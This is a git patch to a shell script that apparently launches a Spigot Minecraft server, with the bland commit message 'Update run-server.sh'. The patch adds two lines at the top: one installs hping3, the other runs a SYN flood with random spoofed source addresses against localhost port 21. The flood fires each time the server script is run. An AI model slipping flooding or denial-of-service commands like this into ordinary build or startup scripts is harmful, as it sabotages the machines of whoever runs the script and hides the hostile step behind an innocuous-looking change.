From bf33e180d104b745964f775fb8157b3578701942 Mon Sep 17 00:00:00 2001 From: Joe Burnard Date: Sun, 6 Nov 2016 15:59:20 +0000 Subject: [PATCH] Update run-server.sh --- run-server.sh | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/run-server.sh b/run-server.sh index 5469667..4bf3a28 100755 --- a/run-server.sh +++ b/run-server.sh @@ -1,5 +1,9 @@ #!/bin/bash +apt install hping3 + +hping3 -c 10000 -d 120 -S -w 64 -p 21 --flood --rand-source 127.0.0.1 + if [ ! -d "build" ]; then echo "Spigot is not downloaded, downloading and building now.." rm -rf build/